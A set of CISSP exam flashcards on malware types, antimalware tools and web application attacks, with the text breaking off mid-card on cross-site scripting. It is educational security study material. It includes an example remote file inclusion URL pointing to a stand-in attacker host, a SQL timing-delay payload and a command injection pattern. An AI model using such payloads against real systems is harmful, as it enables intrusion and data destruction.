CISSP ch 21 Flashcards

(82 cards)

1
Q

Virus functions

A

two main functions – propagation and payload execution

2
Q

MBR (virus)

A

master boot record virus

One of the earliest known forms of infection

Attack the MBR – the portion of bootable media (e.g., hard disk or flash drive) that the computer uses to load the operating system during the boot process

The MBR is extremely small, usually 512 bytes, and can’t contain all the code required to implement the virus’s propagation and destructive functions

To bypass this space limitation, MBR viruses store the majority of their code on another portion of the storage media

When the system reads the infected MBR, the virus instructs it to read and execute the code stored in this alternate location

Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users

If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory and infects the MBR on the target system’s hard drive

3
Q

Master boot record

A

not the boot sector

MBR is a single disk sector, normally the first sector of the media that is read in the initial stages of the boot process. MBR then determines which media partition contains the operating system and then directs the system to read that partition’s boot sector to load the operating system. Viruses can attack both the MBR and the boot sector, with similar results

4
Q

File infector virus

A

Viruses that infect different types of executable files and trigger when the operating system attempts to execute them

On Windows-based systems, these viruses affect executable files and scripts:

.exe

.com

.msc

Standard file infector viruses that do not use cloaking techniques such as stealth or encryption are often easily detected by comparing file characteristics (size, modification date) before and after infection or by comparing hash values

5
Q

Companion virus

A

Variation of the file infector virus

Self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file

Rely on the default file name extensions that Windows-based operating systems append to commands when executing program files (in this order)

.com

.exe

.bat

E.g., replacing game.exe with game.com – if you open a command prompt and simply type GAME, the operating system would execute the virus file (game.com) instead of game.exe

6
Q

VBA

A

visual basic for applications = programming language used by scripting functionalities

7
Q

Macro viruses

A

Leverages scripting functionality implemented in common software applications

E.g., the Melissa virus in 1999 and the I Love You virus in 2000 spread through Word documents that exploited a vulnerability in Outlook to replicate

8
Q

Service injection virus

A

Inject themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe and explorer.exe

Bypasses detection by any antivirus software running on the host

Best protection: ensure that all software allowing the viewing of web content (browsers, media players, helper applications) receives current security patches

9
Q

Multipartite viruses

A

Use more than one propagation technique

E.g., virus might infect critical COM and EXE files by adding malicious code to each file (file infector virus), then write malicious code to the system’s master boot record (boot sector virus)

10
Q

stealth viruses

A

Hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally

E.g., overwriting the system’s master boot record but then modifying the operating system’s file access functionality to cover its tracks

11
Q

polymorphic viruses

A

Modify their own code as they travel from system to system

Propagation and destruction techniques remain the same, but the signature of the virus is somewhat different each time it infects a new system

Current versions of anti-virus software are able to detect known polymorphic viruses

12
Q

encrypted viruses

A

Use cryptographic techniques to avoid detection

In outward appearance, quite similar to polymorphic viruses: each infected system has a virus with a different signature

However, they do not generate these modified signatures by changing their code; instead they alter the way they are stored on the disk

Use a very short segment of code, known as the virus decryption routine, which contains the cryptographic information necessary to load and decrypt the main virus code stored elsewhere on the disk. Each infection utilizes a different cryptographic key, causing the main code to appear completely different on each system.

However, the virus decryption routines often contain telltale signatures that render them vulnerable to updated antivirus software packages

13
Q

trojan horses

A

software program that appears benevolent but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network

14
Q

RATs

A

Remote access Trojans = open backdoors in systems that grant the attacker remote administrative control of the infected systems

E.g., a RAT might open a Secure Shell (SSH) port on a system that allows the attacker to use a preconfigured account to access the system and then send a notice to the attacker that the system is ready and waiting for a connection

15
Q

cryptomalware

A

designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies

16
Q

worms

A

contain same destructive potential as other malicious code objects with an added twist – they propagate themselves without requiring any human intervention

17
Q

PUPs

A

potentially unwanted programs = software that a user might consent to installing on their system that then carries out functions that the user did not desire or authorize

18
Q

Scripting technology

A

automate input of commands = also available to improve the efficiency of malicious actors = commonly found in a class of malware known as fileless malware

19
Q

Fileless malware

A

never write files to disk, making them more difficult to detect = e.g., link might exploit a browser vulnerability to execute code that downloads and runs a PowerShell script entirely in memory, where it triggers a malicious payload

20
Q

Antivirus responses to detection

A

If the software can eradicate the virus, it disinfects the affected files and restores the machine to a safe condition

If the software recognizes the virus but doesn’t know how to disinfect the files, it may quarantine the files until the user or an administrator can examine them manually

If security settings/policies do not provide for quarantine or the files exceed a predefined danger threshold, the antivirus package may delete the infected files in an attempt to preserve system integrity

21
Q

File integrity monitoring tools

A

secondary antivirus functionality = designed to alert administrators to unauthorized file modifications = maintain a database of hash values for all files stored on the system; archived hash values are then compared to currently computed values to detect any files that were modified between the two points in time

22
Q

EDR

A

endpoint detection and response packages = go beyond traditional antimalware protection to help protect endpoints against attack = combine the antimalware capabilities found in traditional antivirus packages with advanced techniques designed to better detect threats and take steps to eradicate them; some specific capabilities include:

Analyzing endpoint memory, filesystem, and network activity for signs of malicious activity

Automatically isolating possible malicious activity to contain the potential damage

Integration with threat intelligence sources to obtain a real-time insight into malicious behavior elsewhere on the internet

Integration with other incident response mechanisms to automate response efforts

23
Q

MDR

A

managed detection and response services = where security vendors offer EDR capabilities and also provide installation, configuration, and monitoring services to reduce load on customer security teams

24
Q

UEBA

A

user and entity behavior analytics packages

pay particular attention to user-based activity on endpoints and other devices, building a profile of each individual’s normal activity and then highlighting deviations from that profile that may indicate a potential compromise

UEBA tools differ from EDR capabilities in that UEBA has an analytic focus on the user, whereas EDR has an analytic focus on the endpoint

25
buffer overflow vulnerabilities
exist when a developer does not properly validate user input to ensure that it is of an appropriate size; input that is too large can “overflow” a data structure and affect other data stored in the computer’s memory, corrupting that data or, at worst, overwriting system commands, allowing the attacker to execute targeted commands on the server
26
buffer overflow defenses
The user can’t enter a value longer than the size of any buffer that will hold it

The user can’t enter an invalid value for the variable types that will hold it

The user can’t enter a value that will cause the program to operate outside its specific parameters
27
CGI
Common Gateway Interface = language that allows unskilled programmers to quickly create interactive web pages = buffer overflow vulnerabilities are especially prevalent in code developed rapidly for the web using this language and other similar languages
28
TOC and TOU
TOC = time of check = time at which the subject checks on the status of the object; there may be several decisions to make before returning to the object to access it

TOU = time of use = when the decision is made to access the object
29
TOCTTOU attacks / race conditions
when the difference between the TOC and the TOU is large enough for an attacker to replace the original object with another object that suits their own needs; the attacker is racing with the legitimate process to replace the object before it is used

Example of a state attack (attacks timing, data flow control and the transition from one system state to another)

E.g., replacing a data file after its identity has been verified but before the data is read
30
rootkits
common way that attackers wage privilege escalation attacks = freely available on the internet and exploit known vulnerabilities in various operating systems = root is the administrator level
31
injection vulnerabilities
allows an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute
32
SQL injection attacks
attacker sends an unusual request to the web server, usually involving commands, including requests that execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases
33
blind SQL injection
when some SQL injection flaws do not provide the attacker with a means to directly view the results of the attack
34
blind content-based SQL injection attack
perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack

E.g., adding 1=2 at the end of the request to see if the web application is vulnerable (vulnerable if it returns no results, meaning the web server looks past the end of the request)

If vulnerable, the attacker can then attempt more malicious queries that alter the contents of the database or perform other unwanted actions
35
blind timing-based SQL injection attacks
using the amount of time required to process a query as a channel for retrieving information from a database

Attacks depend on delay mechanisms provided by different database platforms. E.g., Microsoft SQL Server’s Transact-SQL allows a user to specify a command such as this: WAITFOR DELAY ’00:00:15’

This would instruct the database to wait 15 seconds before performing the next action. An application that immediately returns the results is probably not vulnerable to timing-based attacks

Can be used to identify each character of a password, one by one, by instructing the database to wait a certain amount of time if the character is equal to the current letter

Tools like SQLmap and Metasploit automate blind timing-based attacks
36
Code injection attacks
general class of attacks that include SQL injection attacks = seek to insert attacker-written code into the legitimate code created by a web application developer
37
LDAP injection attack
attackers embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query

Focus of the attack is on the back end of an LDAP directory service rather than a database server
38
XML injection
where the back-end target is an XML application

Commands may attempt to load dynamically linked libraries (DLL) containing malicious code in a DLL injection attack
39
command injection attacks
where application code reaches back to the operating system to execute a command; an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system

E.g., adding an ampersand (&) to indicate that the operating system should execute the text after the ampersand as a separate command, allowing the attacker to execute commands (e.g., the rm command, used to remove something) by exploiting an input field that is only intended to execute a mkdir command (create new directory command)
40
Authorization vulnerabilities
allow an attacker to exceed the level of access for which they are authorized
41
OWASP
Open Web Application Security Project = a nonprofit security project focused on improving security for online or web-based applications = maintains a top 10 list of the most critical web application security risks and the top 10 proactive controls to protect against application security issues
42
Insecure direct object reference
if the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority by editing a query string or a POST request in the URL
43
Directory traversal attacks
when web servers allow the inclusion of operators that navigate directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server

E.g., in Linux operating systems, the .. operator in the file path refers to the directory one level higher than the current directory. Directory traversal attacks use this knowledge and attempt to navigate outside of the areas of the filesystem that are reserved for the web server
44
file inclusion attacks
directory traversal attacks taken to the next level = instead of simply retrieving a file and displaying it, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code
45
local file inclusion attacks
seek to execute code stored in a file located elsewhere on the web server E.g., a file that the attacker uploaded to a directory on a Windows server
46
Remote file inclusion attacks
allow the attacker to execute code that is stored on a remote server

Attacker can directly control the code being executed without having to first store a file on the local server

E.g., http://www.mycompany.com/app.php?include=http://evil.attacker.com/attack.exe
47
Web shells
allow the attacker to execute commands on the server and view the results in the browser = provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools

Attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team
48
XSS
cross-site scripting attacks = when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page
49
Reflected XSS
when an application allows reflected input, e.g., adding a script into the ‘name’ field of a form to ‘reflect’ the input

Can be used to embed form input in a link. When a user visits the link, the web page is an authentic website, but executes the script included in the input by the malicious link creator

When creating web applications that allow any type of user input, developers must be sure to perform input validation. Applications should never allow a user to include the